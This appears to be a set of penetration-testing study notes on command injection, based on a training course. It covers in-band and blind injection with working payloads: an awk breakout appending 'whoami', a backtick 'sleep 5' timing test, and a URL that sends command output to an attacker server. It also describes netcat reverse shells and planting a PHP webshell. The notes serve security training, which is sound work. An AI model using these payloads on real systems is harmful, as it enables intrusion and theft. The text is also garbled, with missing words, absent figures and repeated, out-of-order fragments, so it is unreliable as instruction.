In-Band CI occurs when the attacker can directly insert and execute malicious commands in a web application or system’s input fields or parameters, using the same channel to both send commands and receive outputs.
Simple Payload
The example below is based on TCM's course.
The application takes our input and passes it into a curl command which is then grepped (Figure 1.1). We can start simple by just appending a command using ;, but this gives no output (Figure 1.2). Next, we can try commenting out the grep part by using # (Figure 1.3).
The application we need to test tracks the fleet vehicle's coordinates and calculates the distance between its current position and its destination (Figure 3).
We have two fields that are directly inputted within the executed command. We can start by trying to manipulate the second field first (Figure 4).
# original command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}'
# our goal command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}';whoami;#
# the payload
222)^2))}';whoami;#
# the final command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}';whoami;#)^2))}'
Blind CI occurs when the attacker does not see the output of the injected commands directly. Instead, they infer the success or failure of the commands through side effects or indirect responses.
localhost?q=`sleep 5`
We also use time and curl to measure the response time within the CLI.
$ time curl "http://localhost?q=localhost"
<html>
<SNIP>
</html>
real 0m0.062s # Normal response time
user 0m0.006s
sys 0m0.000s
$ time curl "http://localhost?q=`sleep+5`"
<html>
<SNIP>
</html>
real 0m5.063s # The 'sleep 5' payload worked
user 0m0.003s
sys 0m0.003s
Next, we can achieve by spawning up a web server and passing the desired command as a parameter (Figure 8).
http://172.31.150.94:9999/?q=`whoami`
Capabilities Recon
When we achieve RCE, we can enumerate the target for useful binaries. The w00tw00t was added to the wordlist as an example of what the response of a non-existing binary looks like.
If the target is hardened and we are unable to get a reverse shell, we can try downloading a binary to the target ourselves. In the example below, we download the netcat binary, make it executable, and then execute a reverse shell payload.
If we don't have access to unique binaries and we know the technology that the application uses, we can write our own backdoor. We first need to find the present working directory via the CI vulnerablity (Figure 9).
We can create a payload that creates a PHP webshell under the webroot.
We can also try to achieve by first checking what technology is used on the application and then getting a payload from a repository such as (Figure 2).
The example below is based on TCM's course.
We can achieve RCE with the same logic using the (Figure 5).
The example below is based on TCM's course.
This time we have the same Network Checker app, but the does not work (Figure 6.1). Either something gets filtered, which we can check (Figure 6.2 & 6.3), or we the command is executed but we don't get any output on the front-end.
We can try a payload that alters the application's behaviour (similar to ) and see if this works. This can be tested with Burp Suite's Repeater, as it shows the response time in the bottom right corner (Figure 7).
Next, we can try sending a from the target to our attack host.
